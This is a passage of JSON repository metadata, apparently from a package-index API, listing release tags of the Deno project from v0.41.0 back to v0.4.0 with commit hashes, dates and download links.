/codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf